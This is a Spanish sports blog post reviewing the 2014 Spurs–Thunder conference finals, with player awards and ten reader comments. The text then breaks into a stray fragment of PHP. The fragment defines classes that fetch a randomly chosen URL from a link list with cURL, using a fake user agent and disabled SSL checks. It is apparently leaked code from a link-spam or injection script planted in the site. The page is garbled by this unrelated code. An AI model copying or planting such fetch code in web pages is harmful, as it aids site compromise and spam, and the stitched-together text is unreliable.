PO 2014: Resumen Spurs 4 – Thunder 2

04 de June de 2014 por Simon

Interesante pero carente de emoción. Así fue la serie que enfrentaba a San Antonio Spurs y Oklahoma City Thunder por el título de campeón de conferencia. Es complicado explicar cómo algo carente de emoción nos puede dejar satisfechos y parecernos interesante pero lo cierto es que la lesión y el retorno de Ibaka, las exhibiciones de Westbrook y Durant, y sobretodo las clases magistrales de Tim Duncan mantuvieron el interés de la serie a pesar de la poca igualdad de los partidos.

Hemos presenciado una serie muy bipolar, dependiendo de la cancha en la que se  jugara el signo del partido variaba de un extremo a otro. Los dos primeros partidos se disputaron en el AT&T Center de San Antonio. Allí los Spurs esperaban con el cuchillo entre los dientes a unos Thunder que venían tocados tras disputar una dura serie ante los Clippers y que contaban con la baja de su mejor interior y líder de su defensa. La falta de Serge Ibaka se hizo patente desde el minuto 1 de la serie. Los Spurs campaban a sus anchas por la zona de los Thunder que veían impotentes cómo una y otra vez eran superados en ese apartado del juego. Sólo una racha de inspiración de Oklahoma liderada, cómo no, por Westbrook y Durant consiguió apretar un poco el marcador del primer partido pero fue un espejismo porque los Spurs enseguida retomaron las riendas del partido y se llevaron la primera victoria de forma contundente. El segundo partido fue aún más desigualado. Los Spurs se sintieron más cómodos todavía y destrozaron a los Thunder de tal manera que la mayoría pensábamos que los Spurs viajaban a Oklahoma con la escoba preparada para cerrar la serie.

Nada de eso sucedió. En el Chesapeake Energy Arena la serie viró 180º de manera espectacular. Ibaka, que 10 días antes había sido descartado para toda lo que restaba de temporada, saltaba a la cancha en el quinteto titular de los Thunder. El influjo moral insuflado a su equipo fue aún mayor que su impacto en el juego. Cerró la zona a unos Spurs que se estrellaban una y otra vez donde antes anotaban sin oposición. En el 4º partido la sensación de que la serie había cambiado radicalmente se acentuó. Un Russell Westbrook imperial canalizó todo el juego de su equipo y fue el encargado de machacar a los tejanos y cobrarles todo el daño recibido en los dos primeros partidos de la serie.  La serie quedaba empatada a 2 y la sombra del recuerdo de la final de conferencia de 2012 comenzó a sobrevolar Texas.

Sin embargo, al contrario que hace 2 años, el quinto partido en San Antonio rompió la dinámica. Los locales se vieron revitalizado por su gente, Popovich sacó la pizarra a pasear con un par de ajustes tácticos y sorprendentemente le volvieron a dar la vuelta a la tortilla con la victoria más contundente de toda la serie. Un serio correctivo y una muestra de fuerza que dejaba a los Thunder al borde del precipicio. Ahora ya nadie se atrevía a pronosticar que pasaría en el sexto partido, la serie había enloquecido de tal manera que cualquier escenario planteado por estúpido que fuera, parecía posible. El propio Duncan reconoció que era la serie más loca y extraña que había jugado nunca. Mucha tela.

El sexto partido fue un final de fiesta fantástico. Un encuentro igualado con muchas alternancias en el marcador y que se marchó a la prórroga después de un final de tiempo regular de infarto y cargado de polémica. En la prórroga Duncan se encargó de poner el punto y final a la serie. Fue el amo y señor de los 5 minutos extras y guió a su equipo a sus segundas finales consecutivas.

Otro año más los Thunder se han visto afectados por las lesiones. Si el año pasado fue la de Westbrook este año ha sido Ibaka el que se ha perdido algunos partidos fundamentales. Nadie puede asegurar que con Ibaka a tope desde el inicio de la serie el resultado hubiera sido distinto pero es cierto que la falta del español en los dos primeros partidos les hizo ir a contrapié el resto de la eliminatoria.

Por parte de San Antonio poco que decir. A pesar de que hace tiempo que todo el mundo los descarta ahí están en una nueva final. Este año tendrán enfrente al mismo equipo al que casi tumban el año pasado pero con el factor campo de su lado. La única duda por parte de los Spurs de cara a la final es el estado físico de Tony Parker al que se le ha visto muy renqueante y ha ido de más a menos en esta serie. El resto del equipo ha estado fantástico destacando sobretodo los jugadores del banquillo.

PREMIOS

MVP: Como siempre se nos hace difícil destacar a uno en el juego coral de estos Spurs. Nos vamos a quedar, por los galones adquiridos a lo largo de tropecientos años, con Tim Duncan. Imperial en todas las victorias de su equipo, haciendo lo que tenía que hacer en cada momento y sin hacer demasiado ruido. Ya lo hemos repetido muchas veces pero cuando se retire, será cuando admiremos la verdadera dimensión de este jugador. Para un servidor, el mejor de siempre en su posición.

Rookie: Los Thunder han perdido una final de conferencia pero han podido constatar que tienen un jugador más que interesante para el futuro. El pívot Steven Adams demostró que él no se asusta por grande que sea la empresa y que puede aportar cosas muy  interesantes los próximos años.

Sorpresa: En mi equipo siempre me gustaría tener un jugador de la calidad de Boris Diaw. Nos hemos quedado con las ganas de mencionarle en el MVP por su impresionante aportación en los dos últimos partidos de la serie pero se merecería que le hiciéramos un huequito especial en nuestro resumen.

Decepción: No vamos a particularizarlo en ningún jugador, ni en ningún equipo. Como ya hemos dicho esperábamos algo más de emoción y pelea en todos los partidos de la eliminatoria.

Esfuerzo en vano: Durant y Westbrook. Westbrook y Durant. Cualquiera de los dos valdría para este premio pero esta vez se lo vamos a dar a Russell Westbrook. Ambos jugadores han estado fantásticos pero Westbrook para bien o mal nunca se ha escondido, algoque sí ha hecho Durant durante algunas fases de la serie.

Comenta

10 comentarios a esta entrada

  1. educajasur dice:
    #1

    Hola a todos.

    Impacientes supongo..la gran final está a la vuelta de la esquina.

    Sólo por curiosidad consulté el análisis 2013/2014 de TJNBA:
    “Distinto año, misma historia. Llevamos enterrando a los Spurs en los análisis desde que este blog es blog. Es como aquel número de la lotería al que juegas todos los años. No vas a cambiar de número por aquello de “¿y si toca precisamente el año que dejo de jugarlo?”.Sería para arrancarse el pelo a estirones así que no vamos a romper la tradición.
    El tiempo no perdona, ni siquiera a estos semidioses acostumbrados a desafiar todos los límites.
    Pronóstico: 6º-8º del Oeste (45-50 victorias). Primera ronda.”

    Y otro año más aquí. Siendo primeros de la Regular Season y de revancha contra los Heat.

    Yo personalmente me gustaría que ganasen los Spurs. Por varias razones:
    1. Haters de Duncan= 0
    Haters de James= Infinito.
    Duncan se lo merece. Esto y más. El equipo, el míster, Diaw, GInobilli, Parker, el gran Leonard, Splitter, etc.

    2. Bought VS Built. Ése era uno de los slogan que lucía el estadio de los Spurs, comparando las diferencias en cuanto a una plantilla que ha crecido y se ha ido construyendo, con la de los Heat, hecha a golpe de talonario, y amigismos. Como dijo MJ, a él no se le hubiera ocurrido llamar a Bird y a Magic para juntarse en un mismo equipo, lo bonito era luchar contra ellos.

    3. Porque prefiero que Lebron no gane el Threepeat. No soy un Hater de Lebron, de hecho me gustaba mucho cuando lideraba los Cleveland con aquél equipo, pero sí es cierto que da cierto odio que sea tan abusón, jaja. Además, sí soy un fan de Su Majestad, y un threepeat son palabras mayores, que no me gusta que consigan muchos jugadores 🙂

    4. Porque creo que el favorito, aun sin la ventaja campo, es Miami, y me gusta ir con el que lo tiene más difícil.

    Suerte y GO SPURS!!

    (PD: Os sigo leyendo a diario cracks.)

      Citar

  2. TheDeerHunter dice:
    #2

    Con los Spurs es una tradición equivocarse… así que ya podréis imaginar cual va a ser el análisis del año que viene si lo firmo yo.
    Hubo una época en la que me hubiera fastidiado un poco, pero en este momento no creo que haya mucha gente que se alegre tanto de que estuviera equivocado.
    Estos Spurs molan mucho. A los de Bowen les hubiera mandado a la hoguera con toda la alegría del mundo.

      Citar

  3. Lucho dice:
    #3

    Edujacasur subribo todas las frases que pusiste. Todas. Hasta en la que yo tampoco soy hater de LeBron, pero me gustaba mas en Cleveland. En Manu, Tim, Parker, Leonard, Diaw. En Jordan. En la forma de construir los equipos en base a picks malos y poco trabajo.

      Citar

  4. Denise dice:
    #4

    Yo voy con Miami claramente. De los Spurs, los unicos que me caen bien son Leonard (jugón), y Diaw, de hecho me alegraría un montón por el frances si gana el anillo, porque creo que es un profesional en toda regla que se lo merece. El resto de Spurs, incluido su coach me parecen insulsos ú odiosos, al igual que la franqucia a la que representan.

      Citar

  5. Lucho dice:
    #5

    La primer persona que veo que detesta a Timmy-D. Solo me falta conocer un hater de Ryan Giggs

      Citar

  6. educajasur dice:
    #6

    Lucho:
    La primer persona que veo que detesta a Timmy-D. Solo me falta conocer un hater de Ryan Giggs

    Jajajajaja. Ya te digo.

      Citar

  7. Denise dice:
    #7

    Lucho:
    La primer persona que veo que detesta a Timmy-D. Solo me falta conocer un hater de Ryan Giggs

    No, yo no detesto a Tim Duncan, simplemente ni soy fan suyo ni soy hater. Es el mejor 4 de la historia, no hace falta decir lo bueno que es, el tio sobre cualquier franquicia querría montar su proyecto, si fuera GM haría lo posible por ficharlo, pero desde mi punto de vista personalmente me parece un tio insulso, sin gracia ni chispa como Iniesta por lo que no me alegro ni de sus logros ni de sus fracasos

      Citar

  8. Simon dice:
    #8

    A mí precisamente esa es una de las cosas que más me gustan de Duncan. Nunca se salta una nota y siempre es correcto y habla sobre la cancha. Ahora bien es verdad que si todas las estrellas fueran así de correctas y “sosas” la liga perdería mucho atractivo. A mi me gusta que la mayoría entretengan tanto dentro como fuera con tonterias, vaciladas y demás pq precisamente Duncan mola por ser diferente pero si todos fueran así sería un coñazo.

      Citar

  9. Denise dice:
    #9

    Simon:
    A mí precisamente esa es una de las cosas que más me gustan de Duncan. Nunca se salta una nota y siempre es correcto y habla sobre la cancha. Ahora bien es verdad que si todas las estrellas fueran así de correctas y “sosas” la liga perdería mucho atractivo. A mi me gusta que la mayoría entretengan tanto dentro como fuera con tonterias, vaciladas y demás pq precisamente Duncan mola por ser diferente pero si todos fueran así sería un coñazo.

    Ahí es donde voy, el tio es un ciezo….pero no veas el mamón la pedazo jaca que se ha buscado tras divorciarse,

      Citar

  10. Lucho dice:
    #10

    Simon:
    A mí precisamente esa es una de las cosas que más me gustan de Duncan. Nunca se salta una nota y siempre es correcto y habla sobre la cancha. Ahora bien es verdad que si todas las estrellas fueran así de correctas y “sosas” la liga perdería mucho atractivo. A mi me gusta que la mayoría entretengan tanto dentro como fuera con tonterias, vaciladas y demás pq precisamente Duncan mola por ser diferente pero si todos fueran así sería un coñazo.

    Brillate Simon. Una gran verdad

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>